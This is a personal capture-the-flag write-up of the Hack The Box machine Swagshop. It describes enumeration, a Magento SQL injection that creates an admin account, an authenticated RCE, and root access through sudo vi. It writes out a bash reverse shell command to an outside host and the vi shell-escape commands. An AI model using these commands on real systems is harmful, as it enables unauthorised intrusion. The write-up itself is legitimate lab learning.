# SWAGSHOP | 10.10.10.140

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.140

### Open Ports and Their Services

* 22 - SSH - OpenSSH 7.2p2 Ubuntu
* 80 - HTTP - Apache 2.4.18

## Service Enumeration

### 22 - SSH

Standard SSH setup - we'll come back to this if we get credentials for a valid user.

### 80 - HTTP

Like the nmap scan noted, this server is version 2.4.18 of Apache, and there is what looks to be a default installation of the Magento ecommerce platform running:

![](img/port-80.png)

Searchsploit has some potentials for Magento vulns, it just depends on the version running, which I have not yet determined:

![](img/magento-vulns.png)

I ran a gobuster search on the address and it helped me discover the version, so I can cross-check that with searchsploit and narrow down my options:

![](img/release-notes.png)

The gobuster search gave me quite a few accessible directories with names like 'shell, var, mage, lib, app, pkginfo' etc. There is a lot to discover here.

* database credentials found

![](img/db-creds.png)

* Redis server maybe running on localhost

![](img/redis.png)

* shell script found

![](img/shell-script.png)

* Shell directory found - contains scripts that cannot be run from the browser

![](img/shell-dir.png)

## Exploitation

Finally found the admin login page at 'index.php/admin', and instead of wasting time trying to bruteforce the admin credentials, there is an easier way. It is via the ['shoplift SQLi'](https://github.com/joren485/Magento-Shoplift-SQLI), which will create an admin-level account for us.

I copied that code over, then had to spend some time getting it to run in Python 3, and after running it I had my own admin account I could log into:

![](img/dashboard.png)

Searchsploit had an exploit that worked in python 2, but Python 2 had been utterly purged from my system just days before and the script no longer worked. So what entailed was days and days of learning python 3 just so I could edit the exploit so that it worked.

It was the most difficult thing I have done so far, but I am certain that if anyone who knows python were to look at the code (its in the exploits folder) they would be scratching their head wondering what drugs I was on.

I was so close to giving up, and left this box for nearly a week before I had the heart to come back to it.

Anyway, after I _finally_ got the exploit working in python 3, I just had to run it with a bash reverse shell command:

    ./magento.py http://10.10.10.140/index.php/admin "nohup bash -c 'bash -i >& /dev/tcp/10.10.14.24/6969 0>&1'"  

And I was so so relieved to have a shell:

![](img/user-shell.png)

### Flag

![](img/user-flag.png)

## User Enumeration

### `sudo -l`

This revealed that the www-data user could run vi as root, which hopefully means an easy escalation:

![](img/sudo-l.png)

When you see something juicy like that, best thing to do is to go to [GTFObins](https://gtfobins.github.io). I learn that I can use vi to stay elevated as root and spawn a shell:

![](img/gtfo.png)

## Privilege Escalation

I had a bit of trouble maintaining a stable shell with a good tty, but eventually I was able to become root using vi:

    sudo /usr/bin/vi /var/www/html/test
    :!/bin/bash

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

Oddly, this was the most difficult and frustrating box I have done yet. While it is often the case that public exploits do not work right out of the box, both of the exploits I used (the SQL injection to create an admin user and the RCE) did not work at all in python 3, and the RCE one required extensive rejiggering and hours of trial-and-error in order for it work.

It is definitely owing to my lack of expertise with Python, which I thought I at least had a handle on but this shows how much I need to learn. It was like whack-a-mole: when I fixed one error, another one popped up, over and over. I pretty much had to go line by line and interpret what the error meant, and then keep trying ways to rectify them or work around them altogether. It was painstaking and awful.

But I ultimately prevailed, and developed a renewed appreciation for coders and programmers. During the time I left this box for a few days I began a Python boot camp course, in the hopes that I may improve. I will stick with that when I am not attempting HTB machines.

Steps taken:

* Exploit an SQL injection vulnerability in an out of date version of Magento to create a new user with administrative privileges
* Exploit another vuln, this time an Authenticated RCE to inject a command for a reverse shell
* Use the user privileges to gain a root shell via a vulnerable application, running a command as root
